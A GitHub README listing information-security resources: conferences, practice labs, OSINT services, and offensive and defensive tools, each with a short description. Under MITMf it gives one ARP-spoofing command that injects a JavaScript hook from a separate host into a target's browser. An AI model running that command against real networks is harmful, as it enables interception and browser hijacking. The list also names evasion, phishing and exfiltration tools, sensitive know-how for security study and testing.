Skip to content
/ list-infosec-encyclopedia Public
forked from GoVanguard/list-infosec-encyclopedia

A list of information security related awesome lists and other resources.

1 star 96 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kurtwuckertjr/list-infosec-encyclopedia

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

58 Commits
README.md
README.md
 
 

Repository files navigation

GoVanguard InfoSec Encyclopedia

This is an ongoing compilation of resources we have found helpful and tools we use. If you're new to InfoSec and are looking for a concentrated list of reasources to get started, check out Getting into InfoSec and Cybersecurity.

  • Table of Contents
  • Resources
  • Tools Used
  • Our Reports
  • Our Open Source Software
  • License

Table of Contents

Resources

Information Security Certifications

Books

Lockpicking Resources

Social Engineering Articles

Conferences

  • SANS Annual Conference
  • Cyber Threat Intelligence Summit
  • SANS Pen Test Annual Conferences
  • SANS Security Annual Conferences
  • Security Operations Summit & Training
  • AppSecUSA
  • Infosecurity North America
  • Infosecurity Europe
  • AppSec United States](OWASP National Conference)
  • RSA Conference United States
  • IEEE Symposium on Security & Privacy
  • ISF Annual World Congress
  • ISACA Cyber Security Nexus
  • DerbyCon 8.0
  • CSO50 Conference
  • Infosecurity Europe
  • Securi-Tay
  • Nullcon Conference
  • CanSecWest
  • InfoSec World
  • IAPP Global Privacy Summit
  • ISSA International Conference
  • InfoSec Southwest
  • Infiltrate
  • Atlantic Security Conference](AtlSecCon)
  • SOURCE Annual Conferences
  • Secure360 Conference
  • AFCEA Defensive Cyber Operations Symposium
  • HACKMIAMI
  • Ignite
  • FIRST Conference
  • Black Hat United States
  • DEF CON
  • USENIX Security Symposium
  • 44CON London
  • Hacker Halted - Optionally includes certification-specific training
  • SecTor Canada
  • BruCON
  • DeepSec
  • (ISC)2 Secure Event Series
  • IANS Information Security Forums
  • ISSA CISO Executive Forum Series
  • secureCISO
  • BSides Event Series
  • CISO Executive Summit Series](Invite-only)
  • SecureWorld
  • HOPE
  • HITB
  • Black Hat
  • BSides
  • CCC
  • DerbyCon
  • PhreakNIC
  • ShmooCon
  • CarolinaCon
  • SummerCon
  • Hack.lu
  • Hack3rCon
  • ThotCon
  • LayerOne
  • SkyDogCon
  • SECUINSIDE
  • DefCamp
  • Nullcon
  • Swiss Cyber Storm
  • Virus Bulletin Conference
  • Ekoparty
  • 44Con
  • BalCCon
  • FSec

Online Videos

Free Online Courses

Training Resources

Hacking References And Cheatsheets

Training And Practice Exercises

  • OWASP security knowledge framework - OWASP security knowledge framework labs exercises complete with write-ups.
  • Hacker101 CTF - Webapp CTF style exercises.
  • XSS Exercises - Webapp Cross-site scripting (XSS) bug hunting exercises.
  • Rapid7 Metsploitable - Metasploitable is essentially a penetration testing lab in a box, available as a VMware virtual machine (VMX).
  • Mutillidae - Mutillidae is a free, open source web application provided to allow you to hack a web application. Can be installed on Linux, Windows XP, Windows 7 and windows 10 using XAMMP.
  • OWASP WebGoat - WebGoat is an insecure application that allows the testing of vulnerabilities commonly found in Java-based applications that use common and popular open source components.
  • Gruyere - Gruyere is a web application that has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution.
  • Damn Vulnerable Web Application (DVWA) - Purposely vulnerable PHP/MySQL web application.
  • OWASP Damn Vulnerable Web Sockets (DVWS) - Vulnerable web application which works on web sockets for client-server communication.
  • OWASP NodeGoat - Includes Node.js web applications for learning the OWASP top 10.
  • OWASP SecurityShepard - Web and mobile application security training platform.
  • OWASP Juice Shop - JavaScript based intentionally insecure web application.
  • CPTE Courseware Kit - Paid Official training kit for CPTE exam.
  • OSCP-like Vulnhub VMs - Intentionally vulnerable VMs resembling OSCP.
  • Over the Wire: Natas - Web application challenges.
  • Hack the Box - Online pentesting labs with Windows VMs.
  • Hack This Site - Web application security exercises.
  • RopeyTasks - Simple deliberately vulnerable web application.
  • WebGoat - Intentionally insecure web application maintained by OWASP.
  • Railsgoat - A vulnerable version of Rails that follows the OWASP Top 10.

Informative Youtube Channels

Illustrations and Presentations

Clearnet Exploit Databases

Awesome Master Lists

Knowledge Bases

OSINT Tools Used

General OSINT Tools

  • OSINT Framework
  • NetBootcamp OSINT Tools
  • Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
  • Combine - Open source threat intelligence feed gathering tool.
  • ThreatCrowd - Threat search engine.
  • AbuseIPDB - Search engine for blacklisted IPs or domains.
  • Apility - Search engine for blacklisted IPs or domains.
  • AutoShun - Public repository of malicious IPs and other resources.
  • Binary Defense IP Ban List - Public IP blacklist.
  • Blocklist Ipsets - Public IP blacklist.
  • ThreatTracker - Python based IOC tracker.
  • malc0de Database - Searchable incident database.
  • malc0de DNSSinkhole - List of domains that have been identified as distributing malware during the past 30 days.
  • Malware Domain List - Search and share malicious URLs.
  • Machinae - Multipurpose OSINT tool using threat intelligence feeds.
  • BadIPs - Online blacklist lookup.
  • Spamhaus - Online blacklist lookup.
  • Spamcop - IP based blacklist.
  • theHarvester - E-mail, subdomain and people names harvester.
  • Dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
  • Dnsmap - Passive DNS network mapper.
  • Dnsrecon - DNS enumeration script.
  • Dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • Passivedns-client - Library and query tool for querying several passive DNS providers.
  • Passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • Creepy - Geolocation OSINT tool.
  • Google Hacking Database - Database of Google dorks; can be used for recon.
  • GooDork - Command line Google dorking tool.
  • Dork-cli - Command line Google dork tool.
  • Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
  • Recon-ng - Full-featured Web Reconnaissance framework written in Python.
  • Github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
  • Vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
  • Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations
  • GOSINT - OSINT tool with multiple modules and a telegram scraper.
  • XRay - XRay is a tool for recon, mapping and OSINT gathering from public networks.
  • Intel Techniques Online Tools - Use the links to the left to access all of the custom search tools.
  • FindFrontableDomains - Multithreaded tool for finding frontable domains.
  • CloudFrunt - Tool for identifying misconfigured CloudFront domains.
  • Raven - LinkedIn information gathering tool.
  • InfoByIp - Domain and IP bulk lookup tool.
  • Barcode Reader - Decode barcodes in C#, VB, Java, C\C++, Delphi, PHP and other languages.
  • Belati - The Traditional Swiss Army Knife For OSINT. Belati is tool for Collecting Public Data & Public Document from Website and other service for OSINT purpose.
  • Datasploit - Tool to perform various OSINT techniques on usernames, emails addresses, and domains.
  • Greynoise - "Anti-Threat Intelligence" Greynoise characterizes the background noise of the internet, so the user can focus on what is actually important.
  • pygreynoise - Greynoise Python Library
  • Intrigue Core - Framework for attack surface discovery.
  • OpenRefine - Free & open source power tool for working with messy data and improving it.
  • Orbit - Draws relationships between crypto wallets with recursive crawling of transaction history.
  • OsintStalker - Python script for Facebook and geolocation OSINT.
  • Outwit - Find, grab and organize all kinds of data and media from online sources.
  • Photon - Crawler designed for OSINT
  • Pown Recon - Target reconnaissance framework powered by graph theory.
  • QuickCode - Python and R data analysis environment.
  • SecApps Recon - Information gathering and target reconnaissance tool and UI.
  • sn0int - Semi-automatic OSINT framework and package manager.
  • Zen - Find email addresses of Github users

National Search Engines

Localized search engines by country.

Meta Search

Lesser known and used search engines.

Visual Search and Clustering Search Engines

Search engines that scrape multiple sites (Google, Yahoo, Bing, Goo, etc) at the same time and return results.

  • Carrot2 * Organizes your search results into topics.
  • Yippy * Search using multiple sources at once

Document and Slides Search

Search for data located on PDFs, Word documents, presentation slides, and more.

Pastebin Search

  • PasteLert - PasteLert is a simple system to search pastebin.com and set up alerts (like google alerts) for pastebin.com entries.

Code Search

Search by website source code

  • NerdyData - Search engine for source code.
  • SearchCode - Help find real world examples of functions, API's and libraries across 10+ sources.

Real-Time Search, Social Media Search, and General Social Media Tools

Twitter Search

Facebook Search

Instagram Search

Pinterest Search

Reddit Search

Tools to help discover more about a reddit user or subreddit.

VKontakte Search

Perform various OSINT on Russian social media site VKontakte.

Blog Search

Username Check

Personel Investigations

E-mail Search / E-mail Check

Phone Number Research

  • National Cellular Directory - was created to help people research and reconnect with one another by performing cell phone lookups. The lookup products includes have billions of records that can be accessed at any time, as well as free searches one hour a day, every day.
  • Reverse Phone Lookup - Detailed information about phone carrier, region, service provider, and switch information.
  • Spy Dialer - Get the voicemail of a cell phone & owner name lookup.
  • Twilio - Look up a phone numbers carrier type, location, etc.
  • Phone Validator - Pretty accurate phone lookup service, particularly good against Google Voice numbers.

Company Research

Domain and IP Research

Keywords Discovery and Research

Web History and Website Capture

Image Search

Image Analysis

Web Monitoring

Social Network Analysis

DNS Search And Enumeration

  • Amass - The amass tool searches Internet data sources, performs brute force subdomain enumeration, searches web archives, and uses machine learning to generate additional subdomain name guesses. DNS name resolution is performed across many public servers so the authoritative server will see the traffic coming from different locations. Written in Go.

Network Reconnaissance Tools

  • Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
  • zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
  • nmap - Free security scanner for network exploration & security audits.
  • Netdiscover - Simple and quick network scanning tool.
  • xprobe2 - Open source operating system fingerprinting tool.
  • CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • smbmap - Handy SMB enumeration tool.
  • LdapMiner - Multiplatform LDAP enumeration utility.
  • ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
  • Pentest-Tools - Online suite of various different pentest related tools.
  • Ruler - Tool for remotely interacting with Exchange servers.
  • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • ldapsearch - Linux command line utility for querying LDAP servers.
  • BuiltWith - Technology lookup tool for websites.

Exploitation Enumeration And Data Recovery Tools

Penetration Testing OS Distributions

  • Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
  • Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
  • ArchStrike - Arch GNU/Linux repository for security professionals and enthusiasts.
  • BlackArch - Arch GNU/Linux-based distribution for penetration testers and security researchers.
  • Network Security Toolkit (NST) - Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
  • BackBox - Ubuntu-based distribution for penetration tests and security assessments.
  • Buscador - GNU/Linux virtual machine that is pre-configured for online investigators.
  • Fedora Security Lab - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
  • The Pentesters Framework - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.
  • AttifyOS - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.

Multi-paradigm Frameworks

  • Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Mad-Metasploit - Additional scripts for Metasploit.
  • Armitage - Java-based GUI front-end for the Metasploit Framework.
  • Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
  • ExploitPack - Graphical tool for automating penetration tests that ships with many pre-packaged exploits.
  • Pupy - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
  • AutoSploit - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
  • Rupture - Multipurpose tool capable of man-in-the-middle attacks, BREACH attacks and other compression-based crypto attacks.
  • Mobile Security Framework (MobSF) - Automated mobile application pentesting framework capable of static analysis, dynamic analysis, malware analysis, and web API testing.

Network Vulnerability Scanners

  • OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
  • Nessus - Commercial network vulnerability scanner.
  • Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
  • Vuls - Agentless Linux/FreeBSD vulnerability scanner written in Go.

Web Vulnerability Scanners

  • Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
  • OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Burp Suite - Commercial web vulnerability scanner, with limited community edition.
  • Nikto - Noisy but fast black box web server and web application vulnerability scanner.
  • WPScan - Black box WordPress vulnerability scanner.
  • cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
  • SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
  • ASafaWeb - Free online web vulnerability scanner.

Web Exploitation

  • Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
  • Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit - Exploit WordPress-powered websites with Metasploit.
  • commix - Command Injection exploitation tool.
  • Drupwn - Drupal web application exploitation tool.
  • SQLmap - Automated SQL injection and database takeover tool.
  • sqlninja - Automated SQL injection and database takeover tool.
  • libformatstr - Python script designed to simplify format string exploits.
  • tplmap - Automatic server-side template injection and Web server takeover tool.
  • weevely3 - Weaponized web shell.
  • wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
  • fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • Kadabra - Automatic LFI exploiter and scanner.
  • Kadimus - LFI scan and exploit tool.
  • liffy - LFI exploitation tool.
  • Commix - Automated all-in-one operating system command injection and exploitation tool.
  • sslstrip - Demonstration of the HTTPS stripping attacks.
  • sslstrip2 - SSLStrip version to defeat HSTS.
  • NoSQLmap - Automatic NoSQL injection and database takeover tool.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • webscreenshot - A simple script to take screenshots from a list of websites.
  • IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
  • lyncsmash - A collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations
  • LFISuite - A tool designed to exploit Local File Include vulnerabilities.

Network Tools

  • Network-Tools.com - Website offering an interface to numerous basic network utilities like ping, traceroute, whois, and more.
  • Intercepter-NG - Multifunctional network toolkit.
  • SPARTA - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • dsniff - Collection of tools for network auditing and pentesting.
  • scapy - Python-based interactive packet manipulation program & library.
  • Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
  • Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
  • routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • impacket - Collection of Python classes for working with network protocols.
  • dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
  • Ncat - TCP/IP command line utility supporting multiple protocols.
  • pig - GNU/Linux packet crafting tool.
  • Low Orbit Ion Cannon (LOIC) - Open source network stress testing tool.
  • Sockstress - TCP based DoS utility.
  • UFONet - Layer 7 DDoS/DoS tool.
  • Zarp - Multipurpose network attack tool, both wired and wireless.
  • FireAway - Firewall audit and security bypass tool.
  • enumdb - MySQL and MSSQL bruteforce utilityl

Protocol Analyzers and Sniffers

  • tcpdump/libpcap - Common packet analyzer that runs under the command line.
  • Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
  • Yersinia - Packet and protocol analyzer with MITM capability.
  • Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
  • netsniff-ng - Swiss army knife for Linux network sniffing.
  • Dshell - Network forensic analysis framework.
  • Chaosreader - Universal TCP/UDP snarfing tool that dumps session data from various protocols.

Proxies and MITM Tools

  • Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
  • Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
  • MITMf - Multipurpose man-in-the-middle framework.
    • e.g. mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
  • dnschef - Highly configurable DNS proxy for pentesters.
  • mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus - Automated ettercap TCP/IP Hijacking tool.
  • SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
  • evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
  • BetterCAP - Modular, portable and easily extensible MITM framework.

Wireless Network Tools

  • Aircrack-ng - Set of tools for auditing wireless networks.
  • WiFi Pumpkin - All in one Wi-Fi exploitation and spoofing utility.
  • MANA Toolkit - Rogue AP and man-in-the-middle utility.
  • Wifite - Automated wireless attack tool.
  • Fluxion - Suite of automated social engineering based WPA attacks.
  • NetStumbler - WLAN scanning tool.
  • Kismet - Wireless network discovery tool.
  • wifi-pickle - Fake access point attacks.

Transport Layer Security Tools

  • tlssled - Comprehensive TLS/SSL testing suite.
  • SSLscan - Quick command line SSL/TLS analyzer.
  • SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
  • SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
  • crackpkcs12 - Multithreaded program to crack PKCS#12 files (.p12 and .pfx extensions), such as TLS/SSL certificates.
  • spoodle - Mass subdomain + POODLE vulnerability scanner.
  • SMTP TLS Checker - Online TLS/SSL testing suite for SMTP servers.

Cryptography

  • FeatherDuster - Analysis tool for discovering flaws in cryptography.
  • rsatool - Tool for calculating RSA and RSA-CRT parameters.
  • xortool - XOR cipher analysis tool.

Post-Exploitation

  • CrackMapExec - Multipurpose post-exploitation suite containing many plugins.
  • DBC2 - Multipurpose post-exploitation tool.
  • Empire - PowerShell based (Windows) and Python based (Linux/OS X) post-exploitation framework.
  • EvilOSX - macOS backdoor with docker support.
  • FruityC2 - Open source, agent-based post-exploitation framework with a web UI for management.
  • PowerOPS - PowerShell and .NET based runspace portable post-exploitation utility.
  • ProcessHider - Post-exploitation tool for hiding processes.
  • RemoteRecon - Post-exploitation utility making use of multiple agents to perform different tasks.
  • TheFatRat - Tool designed to generate remote access trojans (backdoors) with msfvenom.
  • Koadic - Windows post-exploitation rootkit, primarily utilizing Windows Script Host.
  • p0wnedShell - PowerShell based post-exploitation utility utilizing .NET.
  • poet - Simple but multipurpose post-exploitation tool.
  • Pupy - Open source cross-platform post-exploitation tool, mostly written in Python.
  • PlugBot - Can be installed onto an ARM device for Command & Control use and more.
  • Fathomless - A collection of post-exploitation tools for both Linux and Windows systems.
  • Portia - Automated post-exploitation tool for lateral movement and privilege escalation.

Exfiltration Tools

  • HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
  • Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • mimikatz - Credentials extraction tool for Windows operating system.
  • mimikittenz - Post-exploitation PowerShell tool for extracting data from process memory.
  • pwnat - Punches holes in firewalls and NATs.
  • dnsteal - Fake DNS server for stealthily extracting files.
  • tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
  • Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
  • PassHunt - Search file systems for passwords.
  • PANHunt - Search file systems for credit cards.
  • mallory - HTTP/HTTPS proxy over SSH.
  • spYDyishai - Local Google credentials exfiltration tool, written in Python.
  • MailSniper - Search through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.).

Static Analyzers

  • OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies.
  • VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
  • Veracode - Commercial cloud platform for static code analysis, dynamic code analysis, dependency/plugin analysis, and more.
  • Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
  • cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs - Free software static analyzer to look for bugs in Java code.
  • sobelow - Security-focused static analysis for the Phoenix Framework.
  • bandit - Security oriented static analyser for python code.
  • Progpilot - Static security analysis tool for PHP code.
  • ShellCheck - Static code analysis tool for shell script.
  • Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
  • smalisca - Android static code analysis tool.
  • Androwarn - Android static code analysis tool.
  • APKinspector - Android APK analysis tool with GUI.
  • pefile - Static portable executable file inspector.
  • Androbugs-Framework - Android program vulnerability analysis tool.
  • Joint Advanced Defense Assessment for Android Applications (JAADAS) - Multipurpose Android static analysis tool.
  • Quick Android Review Kit (Qark) - Tool for finding security related Android application vulnerabilities.
  • truffleHog - Git repo scanner.
  • Yara - Static pattern analysis tool for malware researchers.
  • Icewater - 16,432 free Yara rules.
  • Codelyzer - A set of tslint rules for static code analysis of Angular TypeScript projects. You can run the static code analyzer over web apps, NativeScript, Ionic, etc.

Dynamic Analyzers

  • Cheat Engine - Memory debugger and hex editor for running applications.
  • Cuckoo - Automated dynamic malware analysis tool.
  • ConDroid - Android dynamic application analysis tool.
  • drozer - Android platform dynamic vulnerability assessment tool.
  • DECAF - Dynamic code analysis tool.
  • droidbox - Dynamic malware analysis tool for Android, extension to DECAF.
  • AndroidHooker - Dynamic Android application analysis tool.
  • Inspeckage - Dynamic Android package analysis tool.
  • Androl4b - Android security virtual machine based on Ubuntu-MATE for reverse engineering and malware analysis.
  • idb - iOS app security analyzer.

Hex Editors

  • HexEdit.js - Browser-based hex editing.
  • Hexinator - World's finest (proprietary, commercial) Hex Editor.
  • Frhed - Binary file editor for Windows.
  • Cheat Engine - Memory debugger and hex editor for running applications.

File Format Analysis Tools

  • Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles - Binary data visualization and analysis tool.
  • Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.

Anti-Virus Evasion Tools

  • shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
  • Hyperion - Runtime encryptor for 32-bit portable executables ("PE .exes").
  • AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
  • peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
  • UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
  • Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
  • Windows-SignedBinary - AV evasion tool for binary files.
  • SigThief - Stealing signatures to evade AV.

Hash Cracking Tools

  • Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
  • John the Ripper - Fast password cracker.
  • John the Ripper Jumbo edition - Community enhanced version of John the Ripper.
  • Mentalist - Unique GUI based password wordlist generator compatible with CeWL and John the Ripper.
  • CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
  • CrackStation - Online password cracker.
  • JWT Cracker - Simple HS256 JWT token brute force cracker.
  • Rar Crack - RAR bruteforce cracker.

Windows Utilities

  • Mimikatz - Credentials extraction tool for Windows operating system.
  • Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
  • PowerSploit - PowerShell Post-Exploitation Framework.
  • Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
  • Windows Exploit Suggester - Suggests Windows exploits based on patch levels.
  • Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • Bloodhound - Graphical Active Directory trust relationship explorer.
  • Empire - Pure PowerShell post-exploitation agent.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • Redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
  • Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
  • DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
  • PSKernel-Primitives - Exploiting primitives for PowerShell.
  • GetVulnerableGPO - PowerShell based utility for finding vulnerable GPOs.
  • Luckystrike - PowerShell based utility for the creation of malicious Office macro documents.
  • Commentator - PowerShell script for adding comments to MS Office documents, and these comments can contain code to be executed.
  • Hyena - NetBIOS exploitation.

GNU Linux Utilities

  • Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
  • Linus - Security auditing tool for Linux and macOS.
  • vuls - Linux/FreeBSD agentless vulnerability scanner.
  • Mempodipper - Linux Kernel 2.6.39 < 3.2.2 local privilege escalation script.

macOS Utilities

  • Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
  • Linus - Security auditing tool for Linux and macOS.

Social Engineering Tools

  • SET - The Social-Engineer Toolkit from TrustedSec
  • Gophish - Open-Source Phishing Framework
  • King Phisher - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
  • wifiphisher - Automated phishing attacks against Wi-Fi networks
  • PhishingFrenzy - Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.
  • Evilginx - MITM attack framework used for phishing credentials and session cookies from any Web service
  • Lucy Phishing Server - (commercial) tool to perform security awareness trainings for employees including custom phishing campaigns, malware attacks etc. Includes many useful attack templates as well as training materials to raise security awareness.
  • Catphish - Tool for phishing and corporate espionage written in Ruby.
  • Beelogger - Tool for generating keylooger.

Anonymity Tools

  • Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
  • I2P - The Invisible Internet Project.
  • OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
  • What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • VirusTotal - Online malware scanner.
  • PacketTotal - Online pcap file analyzer.
  • NetworkTotal - Online pcap file analyzer.
  • Hybrid Analysis - Online malware scanner.
  • Malaice.io - Open source malware analyzer.
  • Cuckoo Sandbox - Online malware scanner.
  • Cuckoo Modified - Fork of Cuckoo Sandbox with multiple improvements.
  • Cuckoo Modified API - Python API for Cuckoo Modified.
  • Cryptam - Online malicious document scanner.
  • Ragpicker - Malware analysis tool.
  • DRAKVUF - Virtualization based agentless black-box binary analysis system.
  • Sandboxed Execution Environment - Framework for building sandboxed malware execution environments.
  • Malheur - Automated sandbox analysis of malware behavior.
  • Metadefender - Online file and hash analyzer.
  • Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
  • WDK/WinDbg - Windows Driver Kit and WinDbg.
  • OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 - Open source, crossplatform reverse engineering framework.
  • x64dbg - Open source x64/x32 debugger for windows.
  • firmware.re - Firmware analyzier.
  • HaboMalHunter - Automated malware analysis tool for Linux ELF files.
  • Immunity Debugger - Powerful way to write exploits and analyze malware.
  • Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
  • Medusa - Open source, cross-platform interactive disassembler.
  • plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • peda - Python Exploit Development Assistance for GDB.
  • dnSpy - Tool to reverse engineer .NET assemblies.
  • binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
  • PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
  • Voltron - Extensible debugger UI toolkit written in Python.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
  • rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
  • PDF Examiner - Online PDF scanner.
  • Balbuzard - Malware analysis tool with reverse obfuscation.
  • de4dot - .NET deobfuscator and unpacker.
  • FireEye Labs Obfuscated String Solver (FLOSS) - Malware deobfuscator.
  • NoMoreXOR - Frequency analysis tool for trying to crack 256-bit XOR keys.
  • PackerAttacker - Generic hidden code extractor for Windows malware.
  • unXOR - Tool that guesses XOR keys using known plaintext attacks.
  • xortool - Tool for guessing XOR keys.
  • VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers.

Side-channel Tools

  • ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.

Forensic Tools

Memory Analysis

  • Volatility - Advanced memory forensics framework.
  • VolatilityBot - Automation tool utilizing Volatility.
  • Evolve - Web interface for Volatility advanced memory forensics framework.
  • inVtero.net - Windows x64 memory analysis tool.
  • Linux Memory Extractor (LiME) - A Loadable Kernel Module (LKM) allowing for volatile memory extraction of Linux-based systems.
  • Memoryze - Memory forensics software.
  • Responder PRO - Commercial memory analysis software.
  • WindowsSCOPE - Commercial memory forensics software for Windows systems.
  • Microsoft User Mode Process Dumper - Dumps any running Win32 processes memory image on the fly.
  • PMDump - Tool for dumping memory contents of a process without stopping the process.
  • KnTList - Computer memory analysis tools.
  • Memoryze for Mac - Memoryze for Mac is Memoryze but then for Macs. A lower number of features, however.
  • Rekall - Open source tool and library for the extraction of digital artifacts from volatile memory, RAM, samples.
  • VolDiff - Malware Memory Footprint Analysis based on Volatility.

Memory Imaging Tools

